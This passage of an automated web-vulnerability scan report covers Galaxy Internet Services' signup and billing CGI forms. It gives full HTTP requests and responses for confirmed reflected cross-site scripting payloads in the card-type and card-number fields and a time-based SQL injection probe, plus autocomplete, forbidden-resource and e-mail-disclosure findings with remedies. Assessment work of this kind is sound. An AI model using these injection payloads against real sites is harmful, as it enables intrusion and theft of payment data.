<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Ronald Smith"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x0016C3)</script>"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE=""> <B>Account Type:<BR> , '"--><script>netsparker(0x0016C3)</script></B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /dsl_c2.cgi

/dsl_c2.cgi CONFIRMED

https://secure.gis.net/dsl_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST 250 Minute Bundle
activationfee POST 3
addinternational POST Add_995_International
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGSTREET POST 3
BILLINGZIP POST 3
broadbandphone POST Free_VOIP_Service
CARDTYPE POST '"--><script>alert(0x001748)</script>
CCNUM POST 3
CITY POST 3
COMPANY POST 3
DSL_Installation_Phone POST 3
DSL_Service_Type POST 29.95 Residential 1Mbps with Unlim Phone
dsltotal POST 3
dsltotal1 POST 3
dsltotal2 POST 3
dsltotal3 POST 3
dsltotal4 POST 3
dsltotal5 POST 3
dsltotal6 POST 3
dsltotal7 POST 3
dsltotal8 POST 3
email POST netsparker@example.com
EXPMONTH POST 3
EXPYEAR POST 3
FIRSTNAME POST Ronald Smith
GalaxyUse POST 3
internationalcalling POST 3
LASTNAME POST Ronald Smith
monthlytotal POST 3
monthlytotal0 POST 3
monthlytotal1 POST 3
monthlytotal2 POST 3
monthlytotal3 POST 3
Name_of_Phone_Company POST Ronald Smith
NAMEONCARD POST Ronald Smith
PHONE POST 3
SOURCE POST 3
STATE POST 3
STREET POST 3
subject POST Combo DSL-VOIP Web Order
tosagree POST agree
totaltotal POST 3
ZIP POST 3

Request

POST /dsl_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/dslcombo.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 827
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=250+Minute+Bundle&activationfee=3&addinternational=Add_995_International&BILLINGCITY=3&BILLINGSTATE=3&BILLINGSTREET=3&BILLINGZIP=3&broadbandphone=Free_VOIP_Service&CARDTYPE='%22--%3e%3cscript%3enetsparker(0x001748)%3c%2fscript%3e&CCNUM=3&CITY=3&COMPANY=3&DSL_Installation_Phone=3&DSL_Service_Type=29.95+Residential+1Mbps+with+Unlim+Phone&dsltotal=3&dsltotal1=3&dsltotal2=3&dsltotal3=3&dsltotal4=3&dsltotal5=3&dsltotal6=3&dsltotal7=3&dsltotal8=3&email=netsparker%40example.com&EXPMONTH=3&EXPYEAR=3&FIRSTNAME=Ronald+Smith&GalaxyUse=3&internationalcalling=3&LASTNAME=Ronald+Smith&monthlytotal=3&monthlytotal0=3&monthlytotal1=3&monthlytotal2=3&monthlytotal3=3&Name_of_Phone_Company=Ronald+Smith&NAMEONCARD=Ronald+Smith&PHONE=3&SOURCE=3&STATE=3&STREET=3&subject=Combo+DSL-VOIP+Web+Order&tosagree=agree&totaltotal=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:54:50 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: '"--><script>netsparker(0x001748)</script> <P>3<P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /dsl_c2.cgi

/dsl_c2.cgi CONFIRMED

https://secure.gis.net/dsl_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST 250 Minute Bundle
activationfee POST 3
addinternational POST Add_995_International
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGSTREET POST 3
BILLINGZIP POST 3
broadbandphone POST Free_VOIP_Service
CARDTYPE POST V
CCNUM POST '"--><script>alert(0x001749)</script>
CITY POST 3
COMPANY POST 3
DSL_Installation_Phone POST 3
DSL_Service_Type POST 29.95 Residential 1Mbps with Unlim Phone
dsltotal POST 3
dsltotal1 POST 3
dsltotal2 POST 3
dsltotal3 POST 3
dsltotal4 POST 3
dsltotal5 POST 3
dsltotal6 POST 3
dsltotal7 POST 3
dsltotal8 POST 3
email POST netsparker@example.com
EXPMONTH POST 3
EXPYEAR POST 3
FIRSTNAME POST Ronald Smith
GalaxyUse POST 3
internationalcalling POST 3
LASTNAME POST Ronald Smith
monthlytotal POST 3
monthlytotal0 POST 3
monthlytotal1 POST 3
monthlytotal2 POST 3
monthlytotal3 POST 3
Name_of_Phone_Company POST Ronald Smith
NAMEONCARD POST Ronald Smith
PHONE POST 3
SOURCE POST 3
STATE POST 3
STREET POST 3
subject POST Combo DSL-VOIP Web Order
tosagree POST agree
totaltotal POST 3
ZIP POST 3

Request

POST /dsl_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/dslcombo.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 827
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=250+Minute+Bundle&activationfee=3&addinternational=Add_995_International&BILLINGCITY=3&BILLINGSTATE=3&BILLINGSTREET=3&BILLINGZIP=3&broadbandphone=Free_VOIP_Service&CARDTYPE=V&CCNUM='%22--%3e%3cscript%3enetsparker(0x001749)%3c%2fscript%3e&CITY=3&COMPANY=3&DSL_Installation_Phone=3&DSL_Service_Type=29.95+Residential+1Mbps+with+Unlim+Phone&dsltotal=3&dsltotal1=3&dsltotal2=3&dsltotal3=3&dsltotal4=3&dsltotal5=3&dsltotal6=3&dsltotal7=3&dsltotal8=3&email=netsparker%40example.com&EXPMONTH=3&EXPYEAR=3&FIRSTNAME=Ronald+Smith&GalaxyUse=3&internationalcalling=3&LASTNAME=Ronald+Smith&monthlytotal=3&monthlytotal0=3&monthlytotal1=3&monthlytotal2=3&monthlytotal3=3&Name_of_Phone_Company=Ronald+Smith&NAMEONCARD=Ronald+Smith&PHONE=3&SOURCE=3&STATE=3&STREET=3&subject=Combo+DSL-VOIP+Web+Order&tosagree=agree&totaltotal=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:54:54 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: V <P>'"><script>netsparker(0x001749)</script><P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. This might be an indication of a bigger issue such as SQL Injection or could be the result or poor coding practices.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /dialup2/standard2_c2.cgi

/dialup2/standard2_c2.cgi CONFIRMED

https://secure.gis.net/dialup2/standard2_c2.cgi

Parameters

Parameter Type Value
CARDTYPE POST ';WAITFOR DELAY '0:0:25'--
CITY POST 1
EMAIL POST 1
EXPMONTH POST 3
EXPYEAR POST 3
LOCALPH POST 3
LOGIN POST 3
MAIDENNAME POST Ronald Smith
NAME POST 1
PASSWD POST 3
PHONE POST 1
SOFWARE POST 3
STATE POST 1
STREET POST 1
TYPE POST MasterCard
ZIP POST 1

Request

POST /dialup2/standard2_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/dialup2/standard_c2.cgi
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 196
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

CARDTYPE=%27;WAITFOR%20DELAY%20%270:0:25%27--&CITY=1&EMAIL=1&EXPMONTH=3&EXPYEAR=3&LOCALPH=3&LOGIN=3&MAIDENNAME=Ronald+Smith&NAME=1&PASSWD=3&PHONE=1&SOFWARE=3&STATE=1&STREET=1&TYPE=MasterCard&ZIP=1

Response

HTTP/1.0 500 Internal Server Error
Date: Sat, 25 Sep 2010 04:21:17 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>Server error!</TITLE><LINK REV="made" HREF="mailto:root@gis.net"></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000CC"><H1>Server error!</H1><DL><DD> </DL><DL><DD> Error message: <BR>malformed header from script. Bad header=Failed to send message to any : standard2_c2.cgi </DL><DL><DD> If you think this is a server error, please contact the <A HREF="mailto:root@gis.net">webmaster</A></DL><H2>Error 500</H2><DL><DD><ADDRESS> <A HREF="/">secure.gis.net</A> <BR> <small>Sat Sep 25 00:21:17 2010</small> <BR> <!-- Set this value to 1 to display server version in all error documents --> </ADDRESS></DL></BODY></HTML>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Identified Field Name

PASSWD

Request

GET /webhosts/webhost_c2.cgi HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: secure.gis.net
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 01:41:15 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE=""><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE=""><INPUT NAME="STREET" TYPE="HIDDEN" VALUE=""><INPUT NAME="CITY" TYPE="HIDDEN" VALUE=""><INPUT NAME="STATE" TYPE="HIDDEN" VALUE=""><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE=""><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE=""><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE=""><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE=""> <B>Account Type:<BR> , </B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /voip/

/voip/ CONFIRMED

https://secure.gis.net/voip/

Request

GET /voip/ HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: secure.gis.net
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Sat, 25 Sep 2010 01:41:10 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>Access forbidden!</TITLE><LINK REV="made" HREF="mailto:root@gis.net"></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000CC"><H1>Access forbidden!</H1><DL><DD> You don't have permission to access the requested object. It is either read-protected or not readable by the server. </DL><DL><DD> If you think this is a server error, please contact the <A HREF="mailto:root@gis.net">webmaster</A></DL><H2>Error 403</H2><DL><DD><ADDRESS> <A HREF="/">secure.gis.net</A> <BR> <small>Fri Sep 24 21:41:10 2010</small> <BR> <!-- Set this value to 1 to display server version in all error documents --> </ADDRESS></DL></BODY></HTML>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /voip/

/voip/

https://secure.gis.net/voip/

Found E-mails

root@gis.net

Request

GET /voip/ HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: secure.gis.net
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Sat, 25 Sep 2010 01:41:10 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>Access forbidden!</TITLE><LINK REV="made" HREF="mailto:root@gis.net"></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000CC"><H1>Access forbidden!</H1><DL><DD> You don't have permission to access the requested object. It is either read-protected or not readable by the server. </DL><DL><DD> If you think this is a server error, please contact the <A HREF="mailto:root@gis.net">webmaster</A></DL><H2>Error 403</H2><DL><DD><ADDRESS> <A HREF="/">secure.gis.net</A> <BR> <small>Fri Sep 24 21:41:10 2010</small> <BR> <!-- Set this value to 1 to display server version in all error documents --> </ADDRESS></DL></BODY></HTML>